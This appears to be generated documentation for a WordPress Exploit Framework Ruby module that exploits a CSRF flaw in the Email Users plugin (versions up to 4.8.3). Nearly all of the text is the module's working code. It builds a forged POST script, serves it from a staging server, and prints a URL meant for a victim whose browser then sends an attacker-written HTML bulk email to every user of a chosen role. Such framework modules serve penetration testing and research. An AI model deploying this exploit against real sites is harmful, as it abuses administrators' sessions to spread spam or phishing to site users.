class Wpxf::Auxiliary::EmailUsersCsrfBulkMail
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 6 def initialize super update_info( name: 'Email Users <= 4.8.3 CSRF Bulk Mail', desc: 'This module exploits a lack of CSRF protection in versions <= 4.8.3 of '\ 'the Email Users plugin, which allows for the sending of a bulk e-mail to '\ 'all users of a specified role.', author: [ 'Julien Rentrop', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8601'], ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html'] ], date: 'Aug 15 2016' ) register_options([ StringOption.new( name: 'user_role', desc: 'The role of the users to send the e-mail to', default: 'Subscriber', required: true ), StringOption.new( name: 'email_body', desc: 'The HTML body of the e-mail to send', required: true ), StringOption.new( name: 'email_subject', desc: 'The subject of the e-mail to send', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 45 def check check_plugin_version_from_readme('email-users', '4.8.4') end
initial_script()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 64 def initial_script create_basic_post_script( vulnerable_url, 'send' => 'true', 'fromName' => '', 'fromAddress' => '', 'group_mode' => 'role', 'mail_format' => 'html', 'send_targets[]' => user_role, 'subject' => datastore['email_subject'], 'mailcontent' => datastore['email_body'] ) end
on_http_request(path, _params, _headers)
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 53 def on_http_request(path, _params, _headers) return '' unless path.eql? normalize_uri(xss_path, initial_req_path) emit_info 'Serving CSRF script to victim...' stop_http_server { type: 'text/html', body: initial_script } end
run()
click to toggle source
Calls superclass method
Wpxf::WordPress::StagedReflectedXss#run
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 78 def run return false unless super emit_info 'Provide the URL below to the victim to send the bulk e-mail' puts puts url_with_xss puts start_http_server true end
user_role()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 49 def user_role "role-#{datastore['user_role'].downcase}" end
vulnerable_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 60 def vulnerable_url normalize_uri(wordpress_url_admin, 'admin.php?page=mailusers-send-to-group-page') end